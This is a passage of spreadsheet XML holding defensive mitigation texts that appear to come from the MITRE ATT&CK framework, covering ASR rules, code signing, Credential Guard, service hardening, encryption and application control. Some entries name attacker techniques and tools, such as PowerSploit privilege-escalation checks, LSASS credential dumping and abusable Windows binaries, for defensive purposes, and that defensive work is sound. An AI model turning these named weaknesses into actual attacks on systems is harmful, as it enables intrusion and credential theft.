    <t xml:space="preserve">Periodically check the integrity of system image to ensure it has not been modified. (Citation: Cisco IOS Software Integrity Assurance - Image File Integrity) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) (Citation: Cisco IOS Software Integrity Assurance - Change Control) </t>
  </si>
  <si>
    <t>Enable advanced auditing on AD FS. Check the success and failure audit options in the AD FS Management snap-in. Enable Audit Application Generated events on the AD FS farm via Group Policy Object.(Citation: FireEye ADFS)</t>
  </si>
  <si>
    <t xml:space="preserve">Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made. </t>
  </si>
  <si>
    <t>Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)</t>
  </si>
  <si>
    <t>Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made.</t>
  </si>
  <si>
    <t>Consider periodic review of accounts and privileges for critical and sensitive SharePoint repositories.</t>
  </si>
  <si>
    <t>Audit applications and their permissions to ensure access to data and resources are limited based upon necessity and principle of least privilege.</t>
  </si>
  <si>
    <t>Administrators should audit all cloud and container accounts to ensure that they are necessary and that the permissions granted to them are appropriate.  Additionally, administrators should perform an audit of all OAuth applications and the permissions they have been granted to access organizational data. This should be done extensively on all applications in order to establish a baseline, followed up on with periodic audits of new or updated applications. Suspicious applications should be investigated and removed.</t>
  </si>
  <si>
    <t>Check and remediate unneeded existing authentication certificates as well as common abusable misconfigurations of CA settings and permissions, such as AD CS certificate enrollment permissions and published overly permissive certificate templates (which define available settings for created certificates). For example, available AD CS certificate templates can be checked via the Certificate Authority MMC snap-in (`certsrv.msc`). `certutil.exe` can also be used to examine various information within an AD CS CA database.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub PSPKIAudit)(Citation: GitHub Certify)</t>
  </si>
  <si>
    <t xml:space="preserve">Periodically check the integrity of the running configuration and system image to ensure they have not been modified. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) (Citation: Cisco IOS Software Integrity Assurance - Image File Integrity) (Citation: Cisco IOS Software Integrity Assurance - Change Control) </t>
  </si>
  <si>
    <t>Preemptively search for files containing passwords or other credentials and take actions to reduce the exposure risk when found.</t>
  </si>
  <si>
    <t>Inventory workstations for unauthorized VNC server software.</t>
  </si>
  <si>
    <t>Administrators should perform an audit of all access lists and the permissions they have been granted to access web applications and services. This should be done extensively on all resources in order to establish a baseline, followed up on with periodic audits of new or updated resources. Suspicious accounts/credentials should be investigated and removed.</t>
  </si>
  <si>
    <t xml:space="preserve">Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. </t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)</t>
  </si>
  <si>
    <t xml:space="preserve">Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. </t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [Visual Basic](https://attack.mitre.org/techniques/T1059/005) and [JavaScript](https://attack.mitre.org/techniques/T1059/007) scripts from executing potentially malicious downloaded content (Citation: win10_asr).</t>
  </si>
  <si>
    <t xml:space="preserve">On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent an application from writing a signed vulnerable driver to the system.(Citation: Malicious Driver Reporting Center) On Windows 10 and 11, enable Microsoft Vulnerable Driver Blocklist to assist in hardening against third party-developed drivers.(Citation: Microsoft driver block rules)  </t>
  </si>
  <si>
    <t>On Windows 10, enable cloud-delivered protection and Attack Surface Reduction (ASR) rules to block the execution of files that resemble ransomware. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs.(Citation: Microsoft ASR Nov 2017)(Citation: Enigma Reviving DDE Jan 2018)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts.(Citation: win10_asr)</t>
  </si>
  <si>
    <t>Some endpoint security solutions can be configured to block some types of behaviors related to process injection/memory tampering based on common sequences of indicators (ex: execution of specific API functions).</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [JavaScript](https://attack.mitre.org/techniques/T1059/007) scripts from executing potentially malicious downloaded content (Citation: win10_asr).</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process.</t>
  </si>
  <si>
    <t>On Windows 10, various Attack Surface Reduction (ASR) rules can be enabled to prevent the execution of potentially malicious executable files (such as those that have been downloaded and executed by Office applications/scripting interpreters/email clients or that do not meet specific prevalence, age, or trusted list criteria). Note: cloud-delivered protection must be enabled for certain rules. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office VBA macros from calling Win32 APIs. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated payloads. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. For example, on Windows 10, Attack Surface Reduction (ASR) rules may prevent Office applications from code injection. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, update Windows Defender Application Control policies to include rules that block the older, vulnerable versions of PubPrn.(Citation: Microsoft_rec_block_rules)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to block unsigned/untrusted executable files (such as .exe, .dll, or .scr) from running from USB removable drives. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by [PsExec](https://attack.mitre.org/software/S0029) from running. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent executable files from running unless they meet a prevalence, age, or trusted list criteria and to prevent Office applications from creating potentially malicious executable content by blocking malicious code from being written to disk. Note: cloud-delivered protection must be enabled to use certain rules. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [Visual Basic](https://attack.mitre.org/techniques/T1059/005) scripts from executing potentially malicious downloaded content (Citation: win10_asr).</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by WMI commands from running. Note: many legitimate tools and applications utilize WMI for command execution. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent malware from abusing WMI to attain persistence.(Citation: win10_asr)</t>
  </si>
  <si>
    <t xml:space="preserve">On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent an application from writing a signed vulnerable driver to the system.(Citation: Malicious Driver Reporting Center) On Windows 10 and 11, enable Microsoft Vulnerable Driver Blocklist to assist in hardening against third party-developed service drivers.(Citation: Microsoft driver block rules)  </t>
  </si>
  <si>
    <t>Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)</t>
  </si>
  <si>
    <t>Use of Secure Boot may prevent some implementations of modification to code signing policies.(Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t>Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)</t>
  </si>
  <si>
    <t>Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time.  Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)</t>
  </si>
  <si>
    <t>Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification.</t>
  </si>
  <si>
    <t xml:space="preserve">Enable secure boot features to validate the digital signature of the boot environment and system image using a special purpose hardware device. If the validation check fails, the device will fail to boot preventing loading of unauthorized software. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) </t>
  </si>
  <si>
    <t>Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module) Move system's root of trust to hardware to prevent tampering with the SPI flash memory.(Citation: ESET LoJax Sept 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel Hardware-based Security Technologies)</t>
  </si>
  <si>
    <t>Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing.(Citation: applescript signing) This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.</t>
  </si>
  <si>
    <t>Where possible, only permit execution of signed scripts.</t>
  </si>
  <si>
    <t>Ensure all application component binaries are signed by the correct application developers.</t>
  </si>
  <si>
    <t>Enforce registration and execution of only legitimately signed service drivers where possible.</t>
  </si>
  <si>
    <t>Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform.  Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)</t>
  </si>
  <si>
    <t>Ensure IIS DLLs and binaries are signed by the correct application developers.</t>
  </si>
  <si>
    <t>Several cloud service providers support content trust models that require container images be signed by trusted sources.(Citation: Content trust in Azure Container Registry)(Citation: Content trust in Docker)</t>
  </si>
  <si>
    <t>Require signed binaries.</t>
  </si>
  <si>
    <t>Enforce that all binaries be signed by the correct Apple Developer IDs.</t>
  </si>
  <si>
    <t>Utilize a trust model such as Docker Content Trust with digital signatures to ensure runtime verification of the integrity and publisher of specific image tags.(Citation: Content trust in Docker)(Citation: Content trust in Azure Container Registry)</t>
  </si>
  <si>
    <t>Require signed binaries and images.</t>
  </si>
  <si>
    <t>Set PowerShell execution policy to execute only signed scripts.</t>
  </si>
  <si>
    <t>Enforce execution of only signed PowerShell scripts. Sign profiles to avoid them from being modified.</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure all application component binaries are signed by the correct application developers. </t>
  </si>
  <si>
    <t>Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)</t>
  </si>
  <si>
    <t>On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)</t>
  </si>
  <si>
    <t>With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. It also does not protect against all forms of credential dumping.(Citation: TechNet Credential Guard)(Citation: GitHub SHB Credential Guard)</t>
  </si>
  <si>
    <t>Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - AAA)</t>
  </si>
  <si>
    <t>Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations.(Citation: Cisco IOS Software Integrity Assurance - AAA)</t>
  </si>
  <si>
    <t>With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)</t>
  </si>
  <si>
    <t>Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.</t>
  </si>
  <si>
    <t>Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery. Consider enabling versioning in cloud environments to maintain backup copies of storage objects.(Citation: Rhino S3 Ransomware Part 2)</t>
  </si>
  <si>
    <t xml:space="preserve">Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
</t>
  </si>
  <si>
    <t>Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being uploaded via web browsers.</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being sent over unencrypted protocols.</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being copied to physical mediums.</t>
  </si>
  <si>
    <t>Data loss prevention can be detect and block sensitive data being uploaded to web services via web browsers.</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being copied to USB devices.</t>
  </si>
  <si>
    <t>Consider disabling updating the ARP cache on gratuitous ARP replies.</t>
  </si>
  <si>
    <t>If email delegation is not required, disable it. In Google Workspace this can be accomplished through the Google Admin console.(Citation: Gmail Delegation)</t>
  </si>
  <si>
    <t>Disable legacy network protocols that may be used   to intercept network traffic if applicable, especially those that are not needed within an environment.</t>
  </si>
  <si>
    <t>CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation).</t>
  </si>
  <si>
    <t>Disable unnecessary metadata services and restrict or disable insecure versions of metadata services that are in use to prevent adversary access.(Citation: Amazon AWS IMDS V2)</t>
  </si>
  <si>
    <t>Disable or remove any unnecessary or unused shells or interpreters.</t>
  </si>
  <si>
    <t>Disable Autoruns if it is unnecessary.(Citation: Microsoft Disable Autorun)</t>
  </si>
  <si>
    <t>Consider disabling DCOM through Dcomcnfg.exe.(Citation: Microsoft Disable DCOM)</t>
  </si>
  <si>
    <t>Consider removing previous versions of tools that are unnecessary to the environment when possible.</t>
  </si>
  <si>
    <t>Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017)(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel.(Citation: Microsoft ADV170021 Dec 2017)</t>
  </si>
  <si>
    <t>Consider disabling external email forwarding.(Citation: Microsoft BEC Campaign)</t>
  </si>
  <si>
    <t>Consider disabling emond by removing the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) plist file.</t>
  </si>
  <si>
    <t>Disable Bluetooth in local computer security settings or by group policy if it is not needed within an environment.</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>Minimize available services to only those that are necessary.</t>
  </si>
  <si>
    <t>Disable or block remotely available services that may be unnecessary.</t>
  </si>
  <si>
    <t>InstallUtil may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>Turn off or restrict access to unneeded scripting components.</t>
  </si>
  <si>
    <t>Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)</t>
  </si>
  <si>
    <t xml:space="preserve">MMC may not be necessary within a given environment since it is primarily used by system administrators, not regular users or clients. </t>
  </si>
  <si>
    <t>MSBuild.exe may not be necessary within an environment and should be removed if not being used.</t>
  </si>
  <si>
    <t>Consider disabling auto-mounting of disk image files (i.e., .iso, .img, .vhd, and .vhdx). This can be achieved by modifying the Registry values related to the Windows Explorer file associations in order to disable the automatic Explorer "Mount and Burn" dialog for these file extensions. Note: this will not deactivate the mount functionality itself.(Citation: GitHub MOTW)</t>
  </si>
  <si>
    <t>Consider removing mavinject.exe if Microsoft App-V is not used within a given environment.</t>
  </si>
  <si>
    <t>Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.</t>
  </si>
  <si>
    <t>Consider disabling the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy to prevent elevated execution of Windows Installer packages.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.</t>
  </si>
  <si>
    <t>Odbcconf.exe may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing.
Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)</t>
  </si>
  <si>
    <t xml:space="preserve">Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing.
Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)
</t>
  </si>
  <si>
    <t>It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.
Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.</t>
  </si>
  <si>
    <t>Disable the RDP service if it is unnecessary.</t>
  </si>
  <si>
    <t>This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Regsvcs and Regasm may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>Disable the remote service (ex: SSH, RDP, etc.) if it is unnecessary.</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>Disable Hyper-V if not necessary within a given environment.</t>
  </si>
  <si>
    <t>Disable the SSH daemon on systems that do not require it. For macOS ensure Remote Login is disabled under Sharing Preferences.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Disable SSH if it is not necessary on a host or restrict SSH access for specific users/groups using &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)</t>
  </si>
  <si>
    <t>Use Group Policy to disable screensavers if they are unnecessary.(Citation: TechNet Screensaver GP)</t>
  </si>
  <si>
    <t>Consider disabling software components from servers when possible to prevent abuse by adversaries.(Citation: ITSyndicate Disabling PHP functions)</t>
  </si>
  <si>
    <t>Consider disabling old/dangerous authentication protocols (e.g. NTLM), as well as unnecessary certificate features, such as potentially vulnerable AD CS web and other enrollment server roles.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>Many native binaries may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.</t>
  </si>
  <si>
    <t>Disable Wake-on-LAN if it is not needed within an environment.</t>
  </si>
  <si>
    <t>Specific developer utilities may not be necessary within a given environment and should be removed if not used.</t>
  </si>
  <si>
    <t>Turn off or restrict access to unneeded VB components.(Citation: Microsoft Disable VBA Jan 2020)</t>
  </si>
  <si>
    <t>Uninstall any VNC server software where not required.</t>
  </si>
  <si>
    <t>Consider removing verclsid.exe if it is not necessary within a given environment.</t>
  </si>
  <si>
    <t>Turn off or restrict access to unneeded VB components.</t>
  </si>
  <si>
    <t>Consider disabling functions from web technologies such as PHP’s &lt;code&gt;eval()&lt;/code&gt; that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)</t>
  </si>
  <si>
    <t>Consider enabling the “Network access: Do not allow storage of passwords and credentials for network authentication” setting that will prevent network credentials from being stored by the Credential Manager.(Citation: Microsoft Network access Credential Manager)</t>
  </si>
  <si>
    <t>Disable the WinRM service.</t>
  </si>
  <si>
    <t>Remove or disable access to any systems, resources, and infrastructure that are not explicitly required to be available externally.</t>
  </si>
  <si>
    <t>[Environmental Keying](https://attack.mitre.org/techniques/T1480/001) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.</t>
  </si>
  <si>
    <t>[Execution Guardrails](https://attack.mitre.org/techniques/T1480) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.</t>
  </si>
  <si>
    <t>Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.</t>
  </si>
  <si>
    <t>Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>File encryption should be enforced across email communications containing sensitive information that may be obtained through access to email services.</t>
  </si>
  <si>
    <t>Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. Strong passwords should be used on certain encrypted documents that use them to prevent offline cracking through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.</t>
  </si>
  <si>
    <t>Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</t>
  </si>
  <si>
    <t>Consider encrypting important information to reduce an adversary’s ability to perform tailored data modifications.</t>
  </si>
  <si>
    <t>Encrypt data stored at rest in cloud storage.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019) Managed encryption keys can be rotated by most providers. At a minimum, ensure an incident response plan to storage breach includes rotating the keys and test for impact on client applications.(Citation: Google Cloud Encryption Key Rotation)</t>
  </si>
  <si>
    <t>Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.</t>
  </si>
  <si>
    <t>Ensure Domain Controller backups are properly secured.(Citation: Metcalf 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017) </t>
  </si>
  <si>
    <t>Ensure Domain Controller backups are properly secured.</t>
  </si>
  <si>
    <t xml:space="preserve">When possible, store keys on separate cryptographic hardware instead of on the local system. </t>
  </si>
  <si>
    <t>Ensure certificates as well as associated private keys are appropriately secured. Consider utilizing additional hardware credential protections such as trusted platform modules (TPM) or hardware security modules (HSM). Enforce HTTPS and enable Extended Protection for
Authentication.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.</t>
  </si>
  <si>
    <t>Making the environment variables associated with command history read only may ensure that the history is preserved.(Citation: Securing bash history)</t>
  </si>
  <si>
    <t>Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, and &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables. (Citation: Securing bash history)</t>
  </si>
  <si>
    <t>System settings can prevent applications from running that haven't been downloaded from legitimate repositories which may help mitigate some of these issues. Not allowing unsigned applications from being run may also mitigate some risk.</t>
  </si>
  <si>
    <t>Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Adversaries install new AppCertDLL binaries to execute this technique. Identify and block potentially malicious software executed through AppCertDLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Adversaries can install new AppInit DLLs binaries to execute this technique. Identify and block potentially malicious software executed through AppInit DLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Use application control where appropriate.</t>
  </si>
  <si>
    <t>Set a browser extension allow or deny list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)</t>
  </si>
  <si>
    <t>Consider using application control configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Identify and block potentially malicious unmanaged COR_PROFILER profiling DLLs  by using application control solutions like AppLocker that are capable of auditing and/or blocking unapproved DLLs.(Citation: Beechey 2010)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)</t>
  </si>
  <si>
    <t>Consider using application control to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Use read-only containers, read-only file systems, and minimal images when possible to prevent the execution of commands.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Identify and block potentially malicious and unknown .cpl files by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application control solutions capable of blocking DLLs loaded by legitimate software.</t>
  </si>
  <si>
    <t>Use application control where appropriate, especially regarding the execution of tools outside of the organization's security policies (such as rootkit removal tools) that have been abused to impair system defenses. Ensure that only approved security applications are used and running on enterprise systems.</t>
  </si>
  <si>
    <t>Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.</t>
  </si>
  <si>
    <t>System settings can prevent applications from running that haven't been downloaded through the Apple Store which may help mitigate some of these issues. Not allowing unsigned applications from being run may also mitigate some risk.</t>
  </si>
  <si>
    <t>Use read-only containers, read-only file systems, and minimal images when possible to prevent the running of commands.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Consider blocking the execution of known vulnerable drivers that adversaries may exploit to execute code in kernel mode. Validate driver block rules in audit mode to ensure stability prior to production deployment.(Citation: Microsoft Driver Block Rules)</t>
  </si>
  <si>
    <t xml:space="preserve">System settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues. </t>
  </si>
  <si>
    <t>Limit or restrict program execution using anti-virus software. On MacOS, allowlist programs that are allowed to have the plist tag. All other programs should be considered suspicious.</t>
  </si>
  <si>
    <t>Restrict unallowed ISAPI extensions and filters from running by specifying a list of ISAPI extensions and filters that can run on IIS.(Citation: Microsoft ISAPICGIRestriction 2016)</t>
  </si>
  <si>
    <t>Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Denylist scripting where appropriate.</t>
  </si>
  <si>
    <t>Application control and software restriction tools, such as SELinux, KSPP, grsecurity MODHARDEN, and Linux kernel tuning can aid in restricting kernel module loading.(Citation: Kernel.org Restrict Kernel Module)(Citation: Wikibooks Grsecurity)(Citation: Kernel Self Protection Project)(Citation: Increasing Linux kernel integrity)(Citation: LKM loading kernel restrictions)</t>
  </si>
  <si>
    <t>Allow applications via known hashes.</t>
  </si>
  <si>
    <t>Use application control configured to block execution of MMC if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Use application control configured to block execution of &lt;code&gt;msbuild.exe&lt;/code&gt; if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the &lt;code&gt;msbuild.exe&lt;/code&gt; application and to prevent abuse.(Citation: Microsoft WDAC)</t>
  </si>
  <si>
    <t>Application control may be able to prevent the running of executables masquerading as other files.</t>
  </si>
  <si>
    <t>Consider blocking container file types at web and/or email gateways. Consider unregistering container file extensions in Windows File Explorer.(Citation: Dormann Dangers of VHD 2019)</t>
  </si>
  <si>
    <t>Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.</t>
  </si>
  <si>
    <t>Use application control configured to block execution of mavinject.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
